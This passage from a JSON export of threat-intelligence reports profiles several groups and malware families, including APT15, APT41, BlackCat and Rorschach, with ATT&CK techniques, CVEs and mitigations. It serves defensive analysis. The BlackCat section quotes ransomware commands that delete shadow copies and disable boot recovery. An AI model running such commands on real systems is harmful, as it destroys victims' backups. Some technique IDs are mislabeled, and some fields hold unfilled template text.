\n\nCapabilities (TTPs): \n\nImpact: \n\nService Stop (T1489): \n\nAnonymous Sudan typically overwhelms networks causing services to be rendered useless. (i.e., The \nrecent attack on Microsoft.) \n\nConsequences: \n\n \n\n \n\nInterruption of Service \n\nFinancial Loss \n\nIoCs (Behaviors): \n\n\f  A sudden spike in traffic \n\n  A loss of service \n\nMitigation: \n\nTo mitigate and defend against DDoS attacks load balancers, anomaly detection, and up-to-date network \nfirewalls can all help to defend against DDoS attacks. To prevent future attacks, and to discourage \ncybercriminals from utilizing them, any payment demanded by the attackers to stop the attacks should \nnever be obliged. \n\nResources: \n\nAnonymous Sudan has demonstrated their possession of significant resources, and impactful allies. \n\nThreat Score: 2.3 \n\nOpportunity: 3 \n\nAnonymous Sudan is a well-funded threat group who has demonstrated sufficient capability to attack \nhigh profile targets across the globe. \n\nConsequence: 2 \n\nThe consequences are severe, causing significant financial loss both in demand and interruption of \nservice. \n\nMitigation: 2 \n\nIt takes a moderate amount of resources to mitigate the damage caused by Anonymous Sudan. \n\n \n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-01T18:57:26.293Z"
  },
  "added_by": "3IphbJoz6SbXJDseEV9UYT6ODfz1",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "64f2379b3c3706217c70f213"
  },
  "name": "APT 15",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "APT 15.pdf",
  "file_size": "66 KB",
  "content": "Threat Group Overview:\n\nAPT15, also known as Nickel, Flea, Ke3Chang, and Vixen Panda, is a Chinese state-funded\nAPT. It has been active since at least 2004, making it one of the longest-running APT groups.\nAPT15 primarily focuses on targeting public and private organizations as well as foreign affairs\nministries in the Americas during the period of 2022 to present day 2023.\n\nSources:\n\nBleepingComputer\n\nDarkReading\n\nHeimdall Security [1][2]\n\nMITRE ATT&CK\n\nThe Record\n\nIntent:\n\nFrom BleepingComputer:\n\nIt is notable for using Microsoft Graph API and OneDrive to stealthily obtain its\ncommand and control (C2) infrastructure addresses in encrypted form, giving it\nversatility and resistance against takedowns.\n\nWhen connecting to the command-and-control server, the threat actors can send\ndown various commands to execute on infected devices, including launching\nprograms and downloading new files.\n\nThe particular threat group uses phishing emails as an initial infection vector;\nhowever, they are also known for exploiting vulnerable internet-exposed endpoints\nand using VPNs as an initial access vector.\n\nFrom Heimdall Security:\n\n\fThe Chinese Threat Actor Is Linked to a Wave of Cyberattacks Directed at Iranian\nOrganizations.\n\nAt least since 2010, the Chinese APT group has conducted cyberespionage\ncampaigns against government and diplomatic entities across North America,\nSouth America, Africa, and the Middle East, often operating under the names\nAPT15, KeChang, NICKEL, and Vixen Panda.\n\nResearchers observed state-sponsored threat group APT15 using a new backdoor\ndubbed Graphican. The Chinese hackers used the new malware in a campaign\ntargeting foreign affairs ministries in the Americas, between 2022  2023.\n\nGraphican is equipped to poll the C&C server for new commands to run, including\ncreating an interactive command line that can be controlled from the server,\ndownload files to the host, and set up covert processes to harvest data of interest.\n\nFrom DarkReading:\n\nThe group in question, APT15 (aka Flea, Nickel, Vixen Panda, KE3CHANG, Royal\nAPT, and Playful Dragon) already \"has a track record of honing in on government\ntargets, diplomatic missions, and embassies, likely for intelligence-gathering\npurposes.\"\n\nThis latest campaign primarily focused on ministries of foreign affairs, but also\nincluded a government finance department and a corporation. All the targets were\nbased in the Americas, a region which \"does appear to have become more of a\nfocus for the group in recent times.\"\n\nAPT15 employed well over a dozen tools, malicious and otherwise.\n\nAmong its arsenal: Mimikatz and two of its variants, four Web shells including\nAntSword and China Chopper, and CVE-2020-1472, a three-year-old but CVSS\n10.0 \"Critical\" privilege escalation vulnerability in the Windows server process\nNetlogon.\n\nFrom The Record:\n\nIn the campaign that ran from late 2022 into early 2023, hackers targeted a\ngovernment finance department and an unnamed corporation as well as the foreign\naffairs ministries.\n\nThe Graphican backdoor uses Microsoft Graph API and OneDrive services to\nconnect with an encrypted command-and-control infrastructure address, allowing\nhackers to remotely control compromised systems.\n\n\fNickel traditionally used email as an initial infection vector, but there have also been\nreports of it exploiting public-facing applications and using VPNs to gain initial\naccess to victim networks.\n\nMotivation:\n\nThe Chinese state sponsored threat group APT15 is politically motivated.\n\nTarget(s):\n\n Political Groups\n\n Governments\n\n Private/Public Businesses\n\nOpportunity:\n\n Privilege Escalation Vulnerabilities\n\n Web Shells\n\n Internet Exposed Endpoints\n\nCapabilities (TTPs):\n\n(Null)\n\nConsequences:\n\n Loss of data\n\n Financial loss\n\n\fIoCs (Behaviors):\n\nAPT15 uses Microsoft Graph API and OneDrive to connect to command-and-control\ninfrastructure addresses to remotely control systems, they have also been known to utilize\nphishing emails. (The Record)\n\nMitigation:\n\n Utilize zero trust connections rather than VPNs\n\n Train staff in phishing awareness\n\n Secure exposed endpoints\n\nResources:\n\nThe group has substantial resources at their disposal, all provided by the Chinese government.\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "added_on": {
    "$date": "2023-09-01T19:12:27.604Z"
  },
  "added_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_by": "g9cPReJBIwRQGc7YTG41EIKhfrH2",
  "updated_on": {
    "$date": "2023-09-01T19:17:39.733Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "64f25040cd46cfce622c3dc1"
  },
  "name": "APT 41",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "APT 41.pdf",
  "file_size": "371 KB",
  "content": "APT 41 \n\nThreat Group Overview:  \nAPT 41 is a Chinese state-sponsored threat group that targets organizations and government agencies for \nfinancial gain and cyber espionage.  \n\nSources:  \nThe Hacker News \n\nInfosecurity Magazine \n\nLookout \n\nMITRE ATT&CK \n\nOvert Operator \n\nBleeping Computer \n\nIntent: \nFrom The Hacker News \n\n  APT41, also tracked under the names Axiom, Blackfly, Brass Typhoon (formerly \n\nBarium), Bronze Atlas, HOODOO, Wicked Panda, and Winnti, is known to be \noperational since at least 2007, targeting a wide range of industries to conduct \nintellectual property theft. \n\n  Once installed, both strains of malware request intrusive permissions and come \nfitted with sophisticated data collection and exfiltration capabilities, harvesting \nusers' photos, locations, SMS messages and audio recordings \n\n  \"Use of botnets, proxying traffic in a compromised network, and targeting edge \n\ndevices are not new tactics, nor are they unique to Chinese cyber espionage \nactors,\" the Google-owned threat intelligence firm said. \"However, during the last \ndecade, we have tracked Chinese cyber espionage actors' use of these and other \ntactics as part of a broader evolution toward more purposeful, stealthy, and \neffective operations.\" \n\nFrom Infosecurity Magazine \n\n  The Chinese espionage group APT41 (AKA Double Dragon, BARIUM and Winnti) \nhas been linked to the sophisticated Android surveillanceware known as WyrmSpy \nand DragonEgg. \n\n\f  \"These spyware packages are highly sophisticated and can be used to collect a \nwide range of data from infected devices. We urge Android users to be aware of \nthe threat and to take steps to protect their devices, work and personal data.\" \n\nMotivation: \n  Money \n  Cyberespionage \n  Geopolitics \n\nTarget(s): \n\n  Private/Public Businesses \n  Government \n \n\nIntellectual Property Theft \n\nOpportunity: \n\n  Android devices \n  Endpoint devices \n  Web-facing applications \n\nCVE:  \n\n  CVE-2019-19781  \n  CVE-2020-10189 \n  CVE-2021-44207 \n  CVE-2021-44228 \n \n\nCapabilities (TTPs): \nInitial Access: \n\nExploit Public-Facing Application (T1190): \nAPT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to \ncompromise Citrix Application Delivery Controllers (ADC) and gateway devices. \n\nDuring C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in \nLog4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain \ninitial access.  \n\nExternal Remote Services (T1133): \nAPT41 compromised an online billing/payment service using VPN access between a third-party service \nprovider and the targeted payment service.  \n\n \n \n \n\fValid Accounts (T1078): \nAPT41 used compromised credentials to log on to other systems.  \n\nSpearphishing Attachment (T1566.001): \nAPT41 sent spearphishing emails with attachments such as compiled HTML (.chm) files to initially \ncompromise their victims.  \n\nCompromise Software Supply Chain (T1195.002): \nAPT41 gained access to production environments where they could inject malicious code into legitimate, \nsigned files and widely distribute them to end users. \n\nExecution:  \n\nExploitation for Client Execution (T1203): \nAPT41 leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-\n0199, CVE-2017-11882, and CVE-2019-3396. \n\nWindows Management Instrumentation (T1047): \nAPT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for \npersistence via PowerSploit. \n\nCommand and Scripting Interpreter (T1059): \nAPT 41 utilizes PowerShell, Windows Command Shell, and JavaScript to execute malicious code.  \n\nService Execution (T1569.002): \nAPT41 used svchost.exe and Net to execute a system service installed to launch a Cobalt Strike BEACON \nloader.  \n\nPersistence:  \n\nAccount Manipulation (T1098): \nAPT41 has added user accounts to the User and Admin groups. \n\nBITS Jobs (T1197): \nAPT41 used BITSAdmin to download and install payloads. \n\nRegistry Run Keys / Startup Folder (T1547.001): \nAPT41 created and modified startup files for persistence.[1][2] APT41 added a registry key in \nHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost to establish persistence for \nCobalt Strike.  \n\nLocal Account (T1136.003): \nAPT41 has created user accounts.  \n\nWindows Service (T1543.003): \nAPT41 modified legitimate Windows services to install malware backdoors.[1][2] APT41 created the \nStorSyncSvc service to provide persistence for Cobalt Strike.  \n\n\fAccessibility Features (T1546.008): \nAPT41 leveraged sticky keys to establish persistence. \n\nExternal Remote Services (T1133): \nAPT41 compromised an online billing/payment service using VPN access between a third-party service \nprovider and the targeted payment service. \n\nHijack Execution Flow (T1574): \nAPT 41 utilizes DLL search order hijacking, DLL side-loading, and Dynamic linker hijacking as a means of \ndefense evasion. \n\nBootkit (T1542.003): \nAPT41 deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain \npersistence on victim systems.  \n\nScheduled Task (T1053.005): \nAPT41 used a compromised account to create a scheduled task on a system. \n\nDuring C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on \nUS state government networks: \\Microsoft\\Windows\\PLA\\Server Manager Performance \nMonitor, \\Microsoft\\Windows\\Ras\\ManagerMobility, \n\\Microsoft\\Windows\\WDI\\SrvSetupResults, and \\Microsoft\\Windows\\WDI\\USOShared. \n\nDefense Evasion: \n\nDeobfuscate/Decode Files or Information (T1140): \nDuring C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads. \n\nObfuscate Files or Information (T1027): \nAPT41 used VMProtected binaries in multiple intrusions. \n\nSoftware Packing (T1027.002) \nDuring C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries. \n\nModify Registry (T1112): \nAPT41 used a malware variant called GOODLUCK to modify the registry in order to steal credentials. \n\nProcess Injection (T1055): \nAPT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe \nprocess.  \n\nRootkit (T1014): \nAPT41 deployed rootkits on Linux systems.  \n\nEnvironmental Keying (T1480.001): \nAPT41 has encrypted payloads using the Data Protection API (DPAPI), which relies on keys tied to specific \nuser accounts on specific machines. APT41 has also environmentally keyed second stage malware with \nan RC5 key derived in part from the infected system's volume serial number.  \n\n\fClear Command History (T0170.003): \nAPT41 attempted to remove evidence of some of its activity by deleting Bash histories. \n\nClear Windows Event Logs (T0170.001): \nAPT41 attempted to remove evidence of some of its activity by clearing Windows security and system \nevents.  \n\nFile Deletion (T1070.004): \nAPT41 deleted files from the system.  \n\nMasquerade Task or Service (T1036.004): \nAPT41 has created services to appear as benign system tools. \n\nDuring C0017, APT41 used SCHTASKS /Change to modify legitimate scheduled tasks to run malicious \ncode. \n\nMatch Legitimate Name or Location (T1036.005): \nAPT41 attempted to masquerade their files as popular anti-virus software. \n\nDuring C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and \nchanged KEYPLUG file extensions from .vmp to .upx likely to avoid hunting detections.  \n\nCode Signing (T1553.002): \nAPT41 leveraged code-signing certificates to sign malware when targeting both gaming and non-gaming \norganizations.  \n\nCompiled HTML File (T1218.001): \nAPT41 used compiled HTML (.chm) files for targeting. \n\nRundll32 (T1218.011): \nAPT41 has used rundll32.exe to execute a loader. \n\nCredential Access: \n\nPassword Cracking (T1110.002): \nAPT41 performed password brute-force attacks on the local admin account.  \n\nKeylogging (T1056.001): \nAPT41 used a keylogger called GEARSHIFT on a target system. \n\nLSASS Memory (T1003.001): \nAPT41 has used hashdump, Mimikatz, and the Windows Credential Editor to dump password hashes \nfrom memory and authenticate to other user accounts. \n\nDiscovery:  \n\nFile and Directory Discovery (T1083): \nAPT41 has executed file /bin/pwd on exploited victims, perhaps to return architecture related \ninformation. \n\n\fNetwork Service Discovery (T1135): \nAPT41 used a malware variant called WIDETONE to conduct port scans on specified subnets. \n\nNetwork Share Discovery (T1135): \nAPT41 used the net share command as part of network reconnaissance. \n\nSystem Network Configuration Discovery (T1016): \nAPT41 collected MAC addresses from victim machines. \n\nDuring C0017, APT41 used cmd.exe /c ping %userdomain% for discovery.  \n\nSystem Network Connections Discovery (T1049): \nAPT41 has enumerated IP addresses of network resources and used the netstat command as part of \nnetwork reconnaissance. The group has also used a malware variant, HIGHNOON, to enumerate active \nRDP sessions. \n\nSystem Owner/User Discovery (T1033): \n\nAPT41 used the WMIEXEC utility to execute whoami commands on remote machines.  \n\nDuring C0017, APT41 used whoami to gather information from victim machines.  \n\nLateral Movement: \n\nRemote Desktop Protocol (T1021.001): \nAPT41 used RDP for lateral movement. \n\nSMB/Windows Admin Shares (T1021.002): \nAPT41 has transferred implant files using Windows Admin Shares. \n\nCollection: \n\nData from Local System (T1005): \n\nAPT41 has uploaded files and data from a compromised host.  \n\nDuring C0017, APT41 collected information related to compromised machines as well as \nPersonal Identifiable Information (PII) from victim networks.  \n\nArchive via Utility (T1560.001): \n\nAPT41 created a RAR archive of targeted files for exfiltration.  \n\nCommand and Control: \n\nFallback Channels (T1008): \n\nAPT41 used the Steam community page as a fallback mechanism for C2.  \n\n\fIngress Tool Transfer (T1105): \n\nAPT41 used certutil to download additional files.  \n\nDuring C0017, APT41 downloaded malicious payloads onto compromised systems. \n\nMulti-Stage Channels (T1104): \nAPT41 used a malware variant called WIDETONE to conduct port scans on specified subnets. \n\nProxy (T1090): \n\nAPT41 used a tool called CLASSFON to covertly proxy network communications.  \n\nDuring C0017, APT41 used the Cloudflare CDN to proxy C2 traffic. \n\nDead Drop Resolver (T1102.001): \n\nAPT41 used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, \nPastebin, and Microsoft TechNet.  \n\nDuring C0017, APT41 used dead drop resolvers on two separate tech community forums for \ntheir KEYPLUG Windows-version backdoor; notably APT41 updated the community forum \nposts frequently with new dead drop resolvers during the campaign. \n\nDNS (T1071.001): \nAPT41 used DNS for C2 communications. \n\nFile Transfer Protocol (T1071.002): \nAPT41 used exploit payloads that initiate download via ftp. \n\nDomain Generation Algorithms (T1568.002): \nAPT41 has used DGAs to change their C2 servers monthly. \n\nExfiltration: \n\nExfiltration Over C2 Channel (T1041): \nDuring C0017, APT41 used its Cloudflare services C2 channels for data exfiltration. \n\nExfiltration Over Web Service (T1567): \nDuring C0017, APT41 used Cloudflare services for data exfiltration. \n\nExfiltration Over Unencrypted Non-C2 Protocol (T1048.003): \nDuring C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as \nsubdomains to the attacker-controlled domain. \n\n\fImpact: \n\nData Encrypted for Impact (T1486): \nAPT41 used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a \nransom note to the user. \n\nResource Hijacking (T1496): \nAPT41 deployed a Monero cryptocurrency mining tool in a victims environment.  \n\nConsequences: \n\nInterruption of Service \n\n \n  Loss of Data \n  Termination of Data  \n  Financial Loss \n\nIoCs (Behaviors): \n\n  Compromised endpoint devices \n  Exfiltrated data to and from malicious addresses \n  Malicious Traffic \n\nMitigation: \nHow can one mitigate the damage that may potentially be caused by the threat? What security \ncontrols would have prevented a successful attack if they were implemented? \n\nResources: \n\n  State-sponsored \n\nThreat Score: 3 \n\nOpportunity: 3 \nWith significant resources at their disposal the opportunities of attack are expansive. \n\nConsequences: 3 \nThe consequences of a successful attack can be catastrophic.  \n\nMitigation: 3 \nIt takes significant resources to mitigate the damages done by APT41 \n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-01T20:57:36.050Z"
  },
  "added_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "64f25323cd46cfce622c3dc2"
  },
  "name": "BlackCat Ransomware",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "BlackCat Ransomware Original Report.pdf",
  "file_size": "329 KB",
  "content": "BlackCat/ALPHV Ransomware \n\nThreat Group Overview: \nA one paragraph summary of who the threat group is, and what they do. \n\nSources: \n\nHeimdal Security \n\nHelp Net Security \n\nMITRE ATT&CK \n\nSecurityWeek \n\nSC Media[1][2][3] \n\nIntent: \nFrom SC Media: \n\nTechCrunch reports that Barts Health NHS Trust, which is the largest trust of the UK's \nNational Health Service, disclosed that an investigation regarding an ALPHV/BlackCat \nransomware attack that led to the theft of 70TB of data, which the ransomware \nclaims to be the largest health data breach in the UK, is underway. \n\nCalifornia-based pro bono law firm Law Foundation of Silicon Valley has confirmed \nthat over 42,000 individuals had their personal data, including Social Security \nnumbers, compromised following an ALPHV/BlackCat ransomware attack against its \noffices in February, reports The Record, a news site by cybersecurity firm Recorded \nFuture. \n\nNumerous Australian government agencies and other entities were reportedly \ncompromised as a result of an ALPHV/BlackCat ransomware attack against major \nAustralian law firm HWL Ebsworth in April, reports SecurityWeek. \n\nFrom Heimdal Security: \n\nThe BlackCat ransomware group claims they have breached Barts Health NHS Trust \nand stolen seven terabytes of internal documents. \n\nNow, the hackers are threatening to make a sizable quantity of the trusts private \ninformation public if their demands are not met. \n\n\fBarts Health NHS Trust is the organization overseeing several hospitals and clinics in \nLondon, including St Bartholomews, the Royal London, Mile End, Whipps Cross, and \nNewham. They serve almost 2.5 million people as one of the biggest hospital groups \nin the UK. \n\nFrom Help Net Security:  \n\nIn April 2023, Australian law firm HWL Ebsworth was hit by a cyberattack that \npossibly resulted in data of hundreds of its clients and dozens of government agencies \nbeing compromised. The attack was claimed by the Russian-linked ALPHV/Blackcat \nransomware group. \n\nAs the UK National Cyber Security Centre (NCSC) noted in a recent report focusing on \ncyber threats to the legal sector, law firms handle sensitive client information that \ncybercriminals may find useful, including exploiting opportunities for insider trading, \ngaining the upper hand in negotiations and litigation, or subverting the course of \njustice. \n\nFrom MITRE ATT&CK: \n\nBlackCat is ransomware written in Rust that has been offered via the Ransomware-\nas-a-Service (RaaS) model. First observed November 2021, BlackCat has been used to \ntarget multiple sectors and organizations in various countries and regions in Africa, \nthe Americas, Asia, Australia, and Europe. \n\nMotivation: \n  Money \n  Political gain \n\nTarget(s):  \n\n  Government Agencies \n  Healthcare \n  Professional Services  \n\nOpportunity:  \n  Malvertising \n  Phishing \n  Compromise of Known Vulnerabilities \n  Remote-Access Technologies \n  Distributed Attacks \n  Compromising Managed Service Providers \n\n\fCVE(s): \n\n  CVE-2021-34473 \n  CVE-2021-34523 \n  CVE-2021-31207 \n\nCapabilities (TTPs): \nExecution:  \n\nWindows Management Instrumentation (T1047): \nBlackCat can use wmic.exe to delete shadow copies on compromised networks. \n\nWindows Command Shell (T1059.003): \nBlackCat can execute commands on a compromised network with the use of cmd.exe.  \n\nPersistence:  \n\nAccess Token Manipulation (T1134): \nBlackCat has the ability modify access tokens. \n\nPrivilege Escalation:  \n\nBypass User Account Control (T1548.002): \nBlackCat can bypass UAC to escalate privileges.  \n\nDefense Evasion \n\nWindows File and Directory Permissions Modification (T1222.001): \nBlackCat can use Windows commands such as fsutil behavior set SymLinkEvaluation R2L:1 \nto redirect file system access to a different location after gaining access into compromised networks.  \n\nClear Windows Event Logs (T1070.001): \nBlackCat can clear Windows event logs using wevtutil.exe.  \n\nModify Registry (T1112): \nBlackCat has the ability to add the following registry key on compromised networks to maintain \npersistence: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services \n\\LanmanServer\\Paramenters. \n\nDiscovery: \n\nFile and Directory Discovery (T1083): \nBlackCat can enumerate files for encryption.  \n\nNetwork Share Discovery (T1135): \nBlackCat has the ability to discover network shares on compromised networks.  \n\nDomain Accounts (T1087.002):  \nBlackCat can utilize net use commands to identify domain users.[ \n\n\fDomain Groups (T1069.002): \nBlackCat can determine if a user on a compromised host has domain admin privileges. \n\nRemote System Discovery (T1018): \nBlackCat can broadcasts NetBIOS Name Service (NBNC) messages to search for servers connected to \ncompromised networks.  \n\nSystem Information Discovery (T1082):  \nBlackCat can obtain the computer name and UUID and enumerate local drives. \n\nSystem Owner/User Discovery (T1033): \nBlackCat can utilize net use commands to discover the username on a compromised host.  \n\nLateral Movement:  \n\nLateral Tool Transfer (T1570): \nBlackCat can replicate itself across connected servers via psexec.  \n\nImpact: \n\nData Encrypted for Impact (T1486): \nBlackCat has the ability to encrypt Windows devices, Linux devices, and VMWare instances.  \n\nInternal Defacement (T1491.001): \nBlackCat can change the desktop wallpaper on compromised hosts.  \n\nDisk Content Wipe (T1561.001): \nBlackCat has the ability to wipe VM snapshots on compromised networks.  \n\nInhibit System Recovery (T1490): \nBlackCat can delete shadow copies using vssadmin.exe delete shadows /all /quiet and \nwmic.exe Shadowcopy Delete; it can also modify the boot loader using bcdedit /set \n{default} recoveryenabled No.  \n\nService Stop (T1489): \nBlackCat has the ability to stop VM services on compromised networks. \n\nConsequences: \n\nInterruption of Service \nLoss of Data \n\n \n \n  Possible Termination of Data \n  Data Encryption \n  Financial Loss \n\nIoCs (Behaviors):  \n\n  Psexec \n  Wevtutil[.]exe \n\n\f  General unauthorized modification of files and directories \n\nMitigation: \n\n  Never click on advertisements on workstation computers. \n  Disable Hyperlinks and Attachments on external emails. \n  Practice good password habits. \n  Regularly monitor active directories. \n  Regularly monitor networks for malicious traffic. \n\nResources: \nRussian-linked private group. \n\nThreat Score: 2.3 \nOpportunity: 3 \nThe organization has demonstrated ample capability to gain unauthorized access. \n\nConsequences: 2 \nThe consequences have ranged from insignificant to severe. \n\nMitigation: 2 \nIt takes moderate resources to mitigate an attack from ALPHV/BlackCat. \n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "added_on": {
    "$date": "2023-09-01T21:09:55.359Z"
  },
  "added_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_on": {
    "$date": "2023-09-01T21:10:56.627Z"
  },
  "gcloud_request": null,
  "message": "Completed Successfully"
},
{
  "_id": {
    "$oid": "64f261a468b10964a0344c1e"
  },
  "name": "Rorschach Ransomware",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Rorschach Ransomware Complete Report PDF.pdf",
  "file_size": "263 KB",
  "content": "Rorschach Ransomware Complete Report \n\nThreat Group Overview:  \n\nRorschach is a newly emerged ransomware variant that has gained recognition for its exceptional \nencryption speed, surpassing LockBit 3.0. It was first discovered in April 2023 and is a \ncustomized version of the Babuk ransomware code. What sets Rorschach apart is its self-\npropagating and autonomous capability, utilizing Active Directory Domain Group Policy \nObjects (GPO) to rapidly spread throughout a network and infect every endpoint at remarkable \nspeeds. By leveraging specific Windows capabilities and employing the HC-128 stream cipher \nfor encryption, Rorschach achieves impressive performance. Additionally, it utilizes Curve25519 \nasymmetric key exchange and implements innovative techniques like deception technology to \nevade detection. While it excels in speed, Rorschach does not currently engage in double \nextortion by exfiltrating data. Overall, Rorschach stands out with its speed, customization, and \nunique features, such as making direct system calls, making it a noteworthy threat group in the \nransomware landscape. \n\nSources: \nAnomali \n\nAllinfosecnews \n\nDarkReading \n\nHackRead \n\nMITRE ATT&CK \n\nIntent: \nFrom Anomali:  \n\nRorschach achieves extremely fast encryption due to effective cryptography scheme, \npartial file encryption, effective thread scheduling via I/O completion ports, and \ncompiler optimization, with much of the code being inlined. \n\nFrom DarkReading:  \n\nRorschach, one of the newest ransomware variants, has officially taken the \n\"encryption speed king\" title from LockBit 3.0. \n\nThe Rorschach variant was first detected in April 2023 and is a customized strain of \nthe Babuk ransomware code. \n\n\fHowever, Rorschach has built and demonstrated an interesting self-propagating and \nautonomous capability that leverages Active Directory (AD) Domain Group Policy \nObjects (GPO). \n\nThis enables the malware to rapidly propagate across the network and execute \nransomware on every endpoint at blistering speeds. \n\nBecause Rorschach ransomware implementation is customized for each operating \nsystem type, it leverages specific Windows capabilities known as I/O completion ports \nfor efficient multithreaded encryption.  \n\nOne of Rorschach's particularly innovative moves is its ability to stay under the radar \nby using deception technology  a double-edged sword that is useful for attackers \nand defenders. \n\nFrom HackRead:  \n\nAn exclusive feature of Rorschach ransomware is its effective, fast hybrid-\ncryptography scheme, which makes it the fastest ransomware out there, even faster \nthan LockBit. \n\nCalling it a Speed Demon, Check Point researchers wrote that in a controlled \nencryption speed assessment, the ransomware encrypted 220,000 files in four and a \nhalf minutes. In contrast, LockBit encrypted the same number of files in seven \nminutes. \n\nIt features a high level of customization and has technically unique features that \nhave not been seen before in ransomware, Check Points researchers Jiri Vinopal, \nDennis Yarizadeh, and Gil Gekker explained in their report. \n\nFurthermore, the ransomware is equipped with safeguards to bypass analysis and \ndefense mechanisms, which it achieves via direct system calls. \n\nThis is the first ransomware that can make direct system calls. Until now, only \nmalware families had this feature. \n\nAlthough it seems inspired by several other ransomware, Rorschach is neither linked \nto any other malware family nor affiliated with another ransomware group. \n\nMotivation: \nRorschach is financially motivated.  \n\nTarget(s):  \n\n  Private/public businesses \n  Financial institutions \n\n\fOpportunity:  \nRorschach is sold as a highly customizable ransomware, the opportunities that exist are opportunities \nthat Rorschach is capable of exploiting.  \n\nCapabilities (TTPs): \nExecution: \n\nScheduled Task (T1053.005): \nRorschach schedules itself as a system task to execute itself.  \n\nPersistence: \n\nDLL Side-Loading (T1574.002): \nRorschach side loads itself using legitimate applications to execute its payloads to establish persistence.  \n\nPrivilege Escalation: \n\nGroup Policy Modification (T1484.001):  \nRorschach uniquely self-propagates by modifying group policies.  \n\nDefense Evasion:  \n\nSoftware Packing (T1027.002):  \nRorschach encrypts itself utilizing Curve25519 encryption to evade detection and analysis.  \n\nDeobfuscate/Decode Files or Information (T1140):  \nThe Rorschach itself cannot deobfuscate/decode itself, but rather requires an alternative-private \nmechanism.  \n\nFile Deletion (T1070.004):  \nOnce complete, Rorschach deletes any files that may be linked to itself.  \n\nClear Windows Event Logs (T1070.001): \nTo avoid analysis, and detection, Rorschach clears the Windows event logs.   \n\nImpact: \n\nService Stop (T1489): \nRorschach renders certain services unavailable to inhibit a response to the incident.  \n\nInhibit System Recovery (T1490):  \nRorschach removes built-in services to hinder response teams from aiding in a system recovery. \n\nData Encrypted for Impact (T1486):  \nThe Rorschach ransomware encrypts the data for financial extortion.  \n\nConsequences:  \n\n \n \n\nLoss of services  \nLoss of data  \n\n\f  Possible termination of data  \n  Financial loss \n\nIoCs (Behaviors): \n\n  New or unauthorized scheduled tasks  \n  Unauthorized applications to execute the payloads  \n\nMitigation: \nTo maintain a secure computing environment, it is essential to enforce application authorization by \nknowledgeable personnel and proactively monitor scheduled tasks. Additionally, effective measures such \nas workstation virtualization or strict group policies should be implemented to isolate issues and restrict \ninter-computer access. \n\nResources:  \nRorschach and whatever group it is linked to seems to have significant resources to develop such an \nadvanced ransomware.   \n\nThreat Score: 2.7 \nOpportunity: 2  \nBetween their sufficient funding and the customizable nature of Rorschach, it is a volatile ransomware \nwith an unknown number of opportunities to be exploited. \nConsequences: 3 \nThe success of an attack by Rorschach could lead to severe consequences if successful.  \nMitigation: 3 \nTo mitigate an attack by Rorschach demands significant resources of all categories.  \n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-01T22:11:48.535Z"
  },
  "added_by": "OJgths0OqlZjyBr3ghJtTpFhxPf2",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "64f74502ed13c104bf6d21bf"
  },
  "name": "Asylum Ambuscade",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Asylum Ambuscade Complete Report.pdf",
  "file_size": "312 KB",
  "content": "Asylum Ambuscade Complete Report \n\nThreat Group Overview:  \nAsylum Ambuscade is believed to have commenced its activities in 2020, and it was officially identified in \n2022. Despite the obscurity surrounding the group's origins, their primary targets have become \ndiscernible.  Distinctly focusing on the financial sectors, including crypto-traders, and government \nagencies. Notably, they have orchestrated a significant campaign directed towards organizations \nproviding assistance to refugees during the Russian-Ukraine war. \n\nSources: \nallinfosec \n\nSC Magazine \n\nDark Reading \n\nWelivesecurity \n\nProofPoint \n\nBleepingComputer \n\nIntent: \nFrom BleepingComputer: \n\nThe particular threat group, believed to have been operational since at least 2020, \nwas first identified by Proofpoint in a March 2022 report that focused on a phishing \ncampaign against entities aiding the Ukrainian refugees' movement. \n\nESET has counted 4,500 victims since it started tracking Asylum Ambuscade in \nJanuary 2022, equating to roughly 265 victims/month, making this a very prolific \nthreat actor and a severe threat to organizations worldwide. \n\nWhile the threat actors clearly target cryptocurrency traders and bank accounts for \nprofit, the compromise of SMB entities might point to cyberespionage. \n\nThe exploit initiates the download of an MSI installer that deploys the group's \nSunseed malware, a Lua-based downloader that also generates an LNK file in the \nWindows Startup folder for persistence. \n\nSunseed procures the subsequent-stage payload, Akhbot, from the command-and-\ncontrol server and continues to ping the server to receive and execute 